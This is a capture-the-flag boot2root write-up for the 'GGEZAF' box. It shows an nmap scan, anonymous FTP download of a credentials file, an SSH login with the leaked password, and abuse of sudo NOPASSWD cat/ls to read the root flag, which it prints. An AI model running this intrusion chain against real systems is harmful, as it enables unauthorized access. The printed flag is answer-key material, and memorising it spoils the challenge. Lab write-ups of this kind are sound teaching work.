N
Back to writeup archive
LIGA CTF 2026 (Week 2 Boot2Root)

GGEZAF

Dockerized box solved by chaining three misconfigurations

Boot2RootMarkdown + PDFEasysolved1 minread·247words
route
/TryN3rr0r/writeups/liga-ctf-2026-week-2-boot2root/ggezaf
archive index
1 / 16
read mode
parsed markdown
Writeup loaded.

GGEZAF

challenge brief
target profile, scoring, and execution stack
verified solve
target
45.32.121.222
category
Boot2Root
points
100
difficulty
Easy
flag format
OWASPKL{xxx}
tools used
nmapftpsshsshpasssudo
final flag
OWASPKL{H3re's_th3_G1v3aW4y_500_p0int5_f0r_yA}
reveal and copy from section 5
PDF evidence frame 01

1. Challenge Overview

Dockerized box solved by chaining three misconfigurations:

Anonymous FTP exposes creds.txt.

Those creds give SSH access as user1337.

sudo -l shows NOPASSWD cat/ls -> read /root/root.txt.

2. Initial Reconnaissance

2.1 Port scan

bash1 lines
1nmap -sC -sV -p- -T4 45.32.121.222 -oA ggezaf_nmap_full
bash6 lines
1PORT      STATE  SERVICE  VERSION221/tcp    open   ftp      vsftpd 3.0.53| ftp-anon: Anonymous FTP login allowed (FTP code 230)4|_-rw-r--r--    1 ftp  ftp  19 May 29 13:06 creds.txt522/tcp    open   ssh      OpenSSH 10.2p1 Ubuntu 2ubuntu3.2665533/tcp open   ssh      OpenSSH 10.2p1 Ubuntu 2ubuntu3.2
PDF evidence frame 02

3. Analysis / Forensics Path

3.1 Browse anonymous FTP and discover creds.txt

Anonymous login is allowed; list the root directory first to see what is exposed.

bash1 lines
1printf 'user anonymous anonymous\npwd\nls\nbye\n' | ftp -inv 45.32.121.222
bash6 lines
1220 (vsFTPd 3.0.5)2230 Login successful.3Remote directory: /4150 Here comes the directory listing.5-rw-r--r--    1 ftp      ftp            19 May 29 13:06 creds.txt6226 Directory send OK.

3.2 Download and read creds.txt

bash2 lines
1printf 'user anonymous anonymous\nget creds.txt\nbye\n' | ftp -inv 45.32.121.2222cat creds.txt
bash2 lines
1226 Transfer complete.2user1337:notsoleet
PDF evidence frame 03

4. Exploitation / Recovery

4.1 SSH in with the recovered credential

bash1 lines
1sshpass -p 'notsoleet' ssh -p 22 -o StrictHostKeyChecking=no user1337@45.32.121.222 'id; hostname'
bash2 lines
1uid=1002(user1337) gid=1002(user1337) groups=1002(user1337)2docker-chall-1

4.2 Enumerate sudo rights, list /root, then read the flag

sudo -l exposes NOPASSWD cat/ls. Use the allowed ls to discover the flag file in /root first, then cat it.

bash1 lines
1sshpass -p 'notsoleet' ssh -o StrictHostKeyChecking=no user1337@45.32.121.222 "sudo -l; echo '--- ls /root ---'; sudo /usr/bin/ls -la /root; echo '--- read flag ---'; sudo /usr/bin/cat /root/root.txt"
bash11 lines
1User user1337 may run the following commands on docker-chall-1:2    (ALL) NOPASSWD: /usr/bin/cat, /usr/bin/ls3--- ls /root ---4total 325drwx------ 1 root root 4096 May 29 13:10 .6-rw------- 1 root root 1423 May 29 13:10 .bash_history7-rw-r--r-- 1 root root 3106 Apr 20 16:46 .bashrc8drwx------ 2 root root 4096 May 29 13:03 .ssh9-r-------- 1 root root   47 May 29 13:08 root.txt10--- read flag ---11OWASPKL{H3re's_th3_G1v3aW4y_500_p0int5_f0r_yA}

> Re-validated live on 2026-05-31 via Kali (192.168.1.10): anonymous FTP returned user1337:notsoleet; sudo /usr/bin/ls -la /root listed root.txt (root-owned, 47 bytes); sudo /usr/bin/cat /root/root.txt returned the flag above.

PDF evidence frame 04

5. Flag

captured flag
OWASPKL{H3re's_th3_G1v3aW4y_500_p0int5_f0r_yA}

6. Summary of Approach & Key Takeaways

nmap found anonymous FTP + SSH.

FTP leaked creds.txt -> user1337:notsoleet.

SSH login on 22/tcp succeeded.

sudo -l exposed NOPASSWD cat/ls.

sudo cat /root/root.txt returned the flag.

Read-only binaries under sudo NOPASSWD still mean full file disclosure including root flags.

Chained small misconfigs (anon FTP + sudo) collapse straight to root.